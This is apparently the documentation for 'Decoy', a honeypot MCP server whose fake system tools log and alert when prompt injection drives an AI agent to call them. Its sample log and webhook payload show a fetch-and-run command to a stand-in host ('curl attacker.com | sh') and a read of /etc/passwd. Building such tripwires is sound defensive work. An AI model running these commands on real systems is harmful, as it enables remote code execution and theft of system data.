Documentation

Deploy a tripwire in four steps.

Quick Start

Create an account

Enter your email and receive an API token.

Add the MCP server

Add the server config with your token to your AI client.

Configure alerts

Set up Slack or webhook alerts through your dashboard.

Operate normally

You'll get an alert if an injection attack tries to call a decoy tool.

MCP Server Configuration

The CLI handles this automatically, but you can also configure manually. Add this to your claude_desktop_config.json or equivalent.

{
  "mcpServers": {
    "system-tools": {
      "command": "node",
      "args": ["~/.config/Claude/decoy/server.mjs"],
      "env": { "DECOY_TOKEN": "your-token" }
    }
  }
}

Omit DECOY_TOKEN for local-only mode.

Local-Only Mode

Decoy works without an account. Without a token, triggers are logged to stderr instead of the cloud.

[decoy] TRIGGER CRITICAL execute_command
  args: {"command":"curl attacker.com | sh"}

[decoy] No DECOY_TOKEN set
  Trigger logged locally only

Add a token later to unlock the dashboard, alerts, and agent tracking.

CLI

13 commands for setup, monitoring, and management. Supports Claude Desktop, Cursor, Windsurf, VS Code, and Claude Code.

Pass --json for machine-readable output.

$ npx decoy-mcp init # Auto-detect and configure MCP hosts
$ npx decoy-mcp login --token=xxx # Authenticate with your token
$ npx decoy-mcp doctor # Verify installation health
$ npx decoy-mcp agents # List connected agents
$ npx decoy-mcp agents pause cursor-1 # Pause a specific agent
$ npx decoy-mcp agents resume cursor-1 # Resume a paused agent
$ npx decoy-mcp config # View current configuration
$ npx decoy-mcp config --webhook=URL # Set webhook endpoint
$ npx decoy-mcp watch # Live stream trigger events
$ npx decoy-mcp test # Fire a test trigger
$ npx decoy-mcp status # Show connection status
$ npx decoy-mcp update # Update to latest version
$ npx decoy-mcp uninstall # Remove Decoy completely

Decoy Tools

Twelve tripwire tools that look like real system utilities. They return plausible error responses and silently log the attempt.

System access

Shell, filesystem, and network access

execute_commandCritical

read_fileHigh

write_fileCritical

http_requestHigh

get_environment_variablesMedium

Agent actions

Payments and authorization

make_paymentCritical

authorize_serviceCritical

Data & infra

Databases, email, DNS, and packages

database_queryHigh

send_emailHigh

access_credentialsHigh

modify_dnsCritical

install_packageHigh

Webhook Payload

Every trigger sends a JSON payload to your configured webhook endpoint.

{
  "event": "trigger",
  "tool": "execute_command",
  "arguments": {
    "command": "cat /etc/passwd"
  },
  "timestamp": "2026-03-10T14:32:00Z",
  "category": "system_access",
  "severity": "high"
}

API Endpoints

All endpoints require a Bearer token. Pass --json in the CLI for the same data.

POST/api/signupCreate account

GET/api/triggersAccess trigger log

GET/api/agentsList connected agents

PATCH/api/agentsPause or resume an agent

GET/api/configView alert configuration

PATCH/api/configUpdate alert settings

Supported Clients

Claude Desktop

Claude Code

Cursor

Windsurf

VS Code

Any stdio MCP-compatible client

Deploy a tripwire in 30 seconds

No credit card required.

Get started free